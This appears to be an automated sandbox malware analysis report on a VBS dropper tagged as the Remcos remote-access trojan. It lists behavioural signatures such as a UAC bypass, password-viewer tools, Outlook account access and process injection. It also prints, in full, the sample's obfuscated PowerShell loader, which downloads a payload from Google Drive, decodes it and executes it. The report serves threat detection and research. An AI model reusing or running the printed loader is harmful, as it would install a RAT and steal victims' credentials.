Malware Analysis Report

2025-04-03 14:14

Sample ID 241105-ejch8atkbz
Target 92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523.vbs
SHA256 92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523
Tags
discovery remcos remotehost collection credential_access evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523

Threat Level: Known bad

The file 92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523.vbs was found to be: Known bad.

Malicious Activity Summary

discovery remcos remotehost collection credential_access evasion rat stealer trojan

Remcos

UAC bypass

Remcos family

Detected Nirsoft tools

NirSoft MailPassView

NirSoft WebBrowserPassView

Blocklisted process makes network request

Uses browser remote debugging

Checks computer location settings

Accesses Microsoft Outlook accounts

Legitimate hosting services abused for malware hosting/C2

Network Service Discovery

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Modifies registry class

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-05 03:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-05 03:57

Reported

2024-11-05 04:00

Platform

win7-20241010-en

Max time kernel

150s

Max time network

128s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Jone Semicurvilinear Plimraadden Storywriter #>;$Udlndinge='Ancien';<#Sndag Snydertampens Formulation Forkamres Unrivet Fuldbyrdet #>; function Immenser($Accoucheurers135){If ($host.DebuggerEnabled) {$granerne++;}$kegful=$Systemgruppers+$Accoucheurers135.'Length' - $granerne; for ( $Tyveaarsdagene=4;$Tyveaarsdagene -lt $kegful;$Tyveaarsdagene+=5){$Tostrenget=$Tyveaarsdagene;$Trehager+=$Accoucheurers135[$Tyveaarsdagene];}$Trehager;}function Aegicrania($Skjulesteds){ . ($Indkomstpligtiges) ($Skjulesteds);}$Spiritualty247=Immenser 'OutpM Raso raszMariiIndel,opslDikoaAlbe/Ma i ';$diaschisma=Immenser 'FortT I llEnedsCons1.nre2 rud ';$Unisexuality=' Cog[eyeoNFy.dEMedvTalve.ReflS ileeSingRDesiV eroiChokcKjesEbo lp,dstOAkkoIS aanglobTIn smBuruaSejpnFaitAZip GStheEsandr Wes]Unde:Anky:RadeSKollEIncacSrgeUBegyrSya iUdluTSandYHaknP W eRWiltOCro TDoctoRetsCAnimOR.stlCliv= Wed$kn bdUnbrIDagvATheos uksCDefiHTuskipraeS S,im GraA eng ';$Spiritualty247+=Immenser ' Le 5Pala. Cul0Sp,c Anop(RetrWEriniDue nBu ud AfdoRehaw KatsPers LkkeN ColTElek Demu1 Dor0Fors.Ribb0Havm;.eac OrnaWSlidiAbbrnKloi6 rea4Skye;Thre Progx Hyd6 Imp4Retn;Bigg asr un vVolk:Shel1V,so3nonb1Rnke.Stet0Fo,e)Diab CoulGOmfae OkocSkulkankeoCro./Kapi2Konk0Fem 1Udra0B gh0 C e1 T.l0Immu1B li VoicFWandiAgrersplae,urufTopeoA.tox Ci,/ oh1Plat3 Lik1 T l.Ty,a0Nor ';$Micropaleontologist=Immenser 'AlfoUIndlsNatuESoluRO ga-EfteASfaeGCos EO eaN,shaTmisp ';$pharyngology=Immenser 'Te ehLegatS amtTeaspWhissArch:Lakr/klar/Ad.ldLeverU.foiDri,vVg keSpid. turgFreao looDebigPhthl DipeKany.DraccHosto igmFjor/SaleuGe.fcHovn? ConeWassx ,etpWarroDe,drPrett eo=Heatdmne,ooff wD ganDentltrieo EclaAnchdPlat&BaluiIchtdPors=akad1 M ntBr lI renvDia rHarpdOxyhXRecuTSe oV C pB.ids8OppoiOnyc-SkabCBenokKerna Sacy MadZBioskLag OBog,RRep,LWhig4Uds BParaXFingdBe kF RepVPseueLol hCan 6 FilEKubiOSpar ';$Afstikkerens=Immenser 'Bygg>Pold ';$Indkomstpligtiges=Immenser 'H,loiJonbEBogsx kat ';$Rollings='Forbryderes';$Fornjelsesrejse='\Avlshingstes2.Xyl';Aegicrania (Immenser 'Asga$ CipgFngsl.pvuOMy tb llAOutml Ska:IvitNFu.dareveGValagFaciiLgesN unoGAn slsikkyC ns=Derm$R.prECoveN Apiv.ord:wittA pedpa uaPtar.d psAVaerTKe,eAS un+Sce.$LacefLipoO esiR Mi n,ataJchapEafl.L Br smineeSlikS KlirAdreeAnatjTablsT,roe A.e ');Aegicrania (Immenser ',amf$Co,kG SubL Foro herBOpiuANrmeLRege: litFBedeON nar DemURingD VogRFruge SfafL,nde nkRAfbreDatiNSudacAne.eTraasOdge2K,ns3Fl r5Fab = nor$ CenPUovehHexaATe,rRSurnyRo tn BetgRe no ralReliobackG,ubly In,. Neds,terpPlatL LusIHottTHigh(Rach$ M raVirkfPin s St TComeIDikokKan KMythEslanrSgereImmoN ortsedei)Intr ');Aegicrania (Immenser $Unisexuality);$pharyngology=$Forudreferences235[0];$Aphanozygous=(Immenser ' Adi$UnevGR.velFortO ,hib BorADeliL Edw: GenCLeksyCa dcSminLSan o NedN VasITresCAile=MadsNPseuETuguwG,ne-e vro.errB klujLacteTop CPol,T Bio SkrasTerrYRoqusforetMoo eSultMSeru.ThyrNAirmESpyfTMe t. PseW PopESmmeBSemiCMntrlAcheIfo tE Ma n jerTEksk ');Aegicrania ($Aphanozygous);Aegicrania (Immenser 'Axio$ForeCEncyy Ov.cOpl.luncaosedunIndtiBea.cWean.PodoH .bleBla a Sprd LeveSu er Kl sHete[Ethn$ Dy MCidaiFo kcflder SkvoEa epGe eaGi,al ame SysoKrftn BehtSkrpoYve,lHandoHypegSortiCalisTravtHof ]Sus =Ulde$stemSBejepU stiDallrAngiiPro tInteuFor aColll ettMandy Me.2busl4Thic7Noti ');$Nondeflationary=Immenser ' Epo$VariCPtilySparc l dlLeddoMoton UdliDramcCull.FarlD T ao En,w AcenN sol veroM noaDag,d BesFEmboiSultlBereeOrd,(Kjes$Und.p SprhSulta bjer eiychoknWe ngU.foost rl DewoUdsugWooly.ove,Dyre$ CymRCly.eWessg G naH lltexemtDiskaPaddeHousrEn.esUnde)Dagb ';$Regattaers=$naggingly;Aegicrania (Immenser 'Tra $Xen GGrafl UlvOT anb penaAi wLSino:HattM alaAA,toZErotURhinRThlaK .weAakts= O e(smaktha vEUnd sRearT.ure-FlotpSeriALu.stTankhC vi Toki$UglerbarbEGascg quia Ca,tFrolTSynsaSkafe BalRTranSSpri)Kv l ');while (!$mazurka) {Aegicrania (Immenser ' po$non gPhotlAltao CatbNonsaJil,lTung: BitBTubauLntirJanilVeroeTi stHigh=Outw$ Dimt .unrMariufasteYd.r ') ;Aegicrania $Nondeflationary;Aegicrania (Immenser 'TjrnSParatPan aAestrT.nstTele-B,nkSPy.eL Bl eBry EPiloPCon Fu v4Gip ');Aegicrania (Immenser 'P,an$Os egUrk.l ecaOT adBAr haVirkLJagt:Gi bmpaanABarnzMariuTermRAlonkAgamA Car=C os(EjerTYamseD lmsunnoTSub.-u.baPBrd AStu,TBogoHidrt tyk$LgterOutne NonG MegADisstRaditIndkA HaaE .apRNoncs Cam)Blok ') ;Aegicrania (Immenser 'U vu$ EksgCrepLJussOBetaB t eaBehaLHy l: losSRotukafplrFor u enceBudctYverSFrar=Poss$ ChuGAlarLBanaOUtilBDataAPa.tLCajs:Bi laCompN SigtOverIJ coPBlokY MatostyrNL veITraiNLich+hums+Tier%Pyro$MatsFVagaOU.dnRSin u HalDMalarDo sEHiblFOvere.isfRCha,eSta NKosoC Kr.eTrirs .ve2Prop3 Fll5Runr. Cucc SwaoMerruDoglNNaziTKorr ') ;$pharyngology=$Forudreferences235[$skruets];}$Fortidige=289428;$Tacamahac=30629;Aegicrania (Immenser 'Rusl$Tee,GInd LOmstOPhosbMeleA pdL.ele:Antit pipRPro YSifaKomskKPh nE TartGuldECoy k A rNNit,i PrekBenzSSkil Burl=Su e Ru,GOverEButtT Phy-MyolC T koStavnBr,mtSupeEAsepnbrndTLelw Pneo$InsiRFasee Argg,nkoa Ov,T.isatBagtaNonceraasRHedgsNeg, ');Aegicrania (Immenser ' N,n$ EftgNonll banoKultb ,fsa achlPena:St aIFrees Rego .edcParar Ke ySan mV rieOver Russ= mo Roth[TaclS,ndbyAigls ydrt.alue DenmMy,o.ret CC gaoUnc,nVomivBhlae,bbrrstr tK,al] Aet:Kred:ForsFTilfr Subo icmW ldB Unda,ulpsBru.eSk.r6,rys4SensSSimrtWarsrMenniFedtnT pngLa.i(Gods$Syn.TM,strHumayMicokLi,nkRegne.owat Rege petkDrifnMythi,inakOutcs Co.)Imit ');Aegicrania (Immenser ' fem$Opdrg ,anl OakoRielbMotoAUd.olServ: b pRanb E RodCSediIS rirBrinKAfsku hytlBumkEBusaRRestiA tiNMargg DucESlb,rSquaNEboneLuttsr ce K n= Dr Hor[UnarS kanYDel s lertCor E DevmS,if.Torgt NoneKarixSa ktU,de. SoreMis,nClocc ekoPiped OboIDro nKittGCur ],kva:Subs: OpsATrflSDerecMateiTridIFo s.DigegFrdsE E hTg ngS M ntDeltraccoimuhaN.ectgUdkl( Gen$SymbISyres ilkOVel,CCyt RLy tYMo rMVolaeE cl)N ur ');Aegicrania (Immenser 'Hj,e$AverGS inl Ha.OForfBProda DisLOvid: UpsjU,ocu MasMFlorb OrnUAt acsaboK ela=Bere$Od.rRDukkE pheCeksaiSamlrHadbkSkufuNedrl .aueSilkRNonmiM hanPrecgUnwwe KulrVrdiNStukE ReaSS.pe.StamsBa nuuncabRelesSmittEndorSt kiBenzNMesoGSt r(Dis $TystfAdr oAncyR CerTTy,nIVeleDUnboiSaragMedaeBene,Hie $ NavTCe ea R pc hibAB,limMedlaRigshTo aABrudCK.lb) el ');Aegicrania $Jumbuck;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\Cab4A99.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2736-20-0x000007FEF626E000-0x000007FEF626F000-memory.dmp

memory/2736-21-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

memory/2736-22-0x0000000002510000-0x0000000002518000-memory.dmp

memory/2736-23-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-24-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-25-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-26-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-27-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-28-0x000007FEF626E000-0x000007FEF626F000-memory.dmp

memory/2736-29-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-30-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-31-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-32-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-05 03:57

Reported

2024-11-05 04:00

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3376 set thread context of 4612 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3376 set thread context of 1040 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3376 set thread context of 872 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4456 wrote to memory of 4904 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 4904 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3960 wrote to memory of 3376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 3960 wrote to memory of 3376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 3960 wrote to memory of 3376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 3960 wrote to memory of 3376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 3376 wrote to memory of 3436 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 3376 wrote to memory of 3436 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 3376 wrote to memory of 3436 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 3436 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3436 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3436 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4916 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3376 wrote to memory of 4916 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
